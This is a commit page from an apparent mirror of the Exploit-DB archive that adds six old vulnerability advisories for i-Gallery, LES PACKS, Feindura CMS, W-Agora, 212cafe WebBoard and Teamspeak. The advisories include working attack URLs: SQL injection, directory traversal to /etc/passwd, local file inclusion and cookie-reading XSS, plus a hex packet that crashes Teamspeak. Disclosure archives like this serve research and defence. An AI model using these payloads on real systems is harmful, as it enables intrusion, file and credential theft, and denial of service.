bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_13_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-13 04:45:24 +00:00
parent 174997aa11
commit 60e5c6c2a0
7 changed files with 87 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -31456,3 +31456,9 @@ id,file,description,date,author,platform,type,port
34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution Vulnerability",2010-10-26,s_n,linux,remote,0 34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution Vulnerability",2010-10-26,s_n,linux,remote,0
34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 Multiple Cross Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0 34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 Multiple Cross Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Include Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0 34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Include Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0
34935,platforms/php/webapps/34935.txt,"LES PACKS 'ID' Parameter SQL Injection Vulnerability",2010-10-27,Cru3l.b0y,php,webapps,0
34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0
34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware Multiple Local File Include and Cross Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0
34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption Vulnerability",2010-10-28,"Jokaim and nSense",windows,dos,0
34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 Local File Include and Cross Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0
34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta 'view.php' Directory Traversal Vulnerability",2009-05-29,MrDoug,php,webapps,0

Can't render this file because it is too large.

9
platforms/asp/webapps/34936.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44467/info
i-Gallery is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to download and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks.
i-Gallery 3.4 and 4.1 are vulnerable; other versions may also be affected.
http://www.example.com/igallery41/streamfile.asp?i=./../../../index.asp&f=subdir

7
platforms/php/webapps/34935.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44457/info
LES PACKS is prone to an SQL-injection vulnerability.
An attacker can exploit this SQL-injection issue to carry out unauthorized actions on the underlying database, which may compromise the application and aid in further attacks.
http://www.example.com/index.php?Page=articles&ID=-1+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15

21
platforms/php/webapps/34937.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/44501/info
Feindura CMS is prone to multiple local file-include vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Feindura CMS versions 1.0rc and prior are vulnerable.
Local file Include:
http://www.example.com/[path]/library/process/download.php?filename=[path/to/file]
http://www.example.com/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
http://www.example.com/[path]/?language=../../../../../../../etc/passwd%00
Cross Site Scripting:
http://www.example.com/[path]/library/sites/editor.php?category=[XSS]

20
platforms/php/webapps/34939.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/44507/info
W-Agora is prone to multiple local file-include vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to view and execute local files within the context of the webserver process or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
W-Agora 4.1.5 is vulnerable; other versions may also be affected.
http://www.example.com/news/for-print.php3?bn=x&key=1282850719%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
http://www.example.com/news/login.php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
'conf' folder:
http://www.example.com/news/for-print.php3?bn=1
http://www.example.com/news/login.php3?bn=1
Any folder (only on Windows-servers):
http://www.example.com/news/for-print.php3?bn=..\1
http://www.example.com/news/login.php3?bn=..\1

10
platforms/php/webapps/34940.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/44510/info
212cafe WebBoard is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to retrieve and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks.
212cafe WebBoard 2.90 beta is vulnerable; other versions may also be affected.
http://www.example.com/webboard/view.php?topic=../../../../../../etc/passwd%00
http://www.example.com/webboard/view.php?topic=../../../../../../WINDOWS/system32/eula

14
platforms/windows/dos/34938.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/44502/info
Teamspeak is prone to a memory-corruption vulnerability.
Attackers can exploit this issue by sending a specially crafted voice transmission packet containing malicious data.
Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.
Teamspeak version 2.0.32.60 is vulnerable.
The following proof-of-concept packet is available:
f2be000426ad7e00300000000001000a414141414141414141424141414141
4141414141414141414141414141414141414100ff99414141424242424141
414141414141414141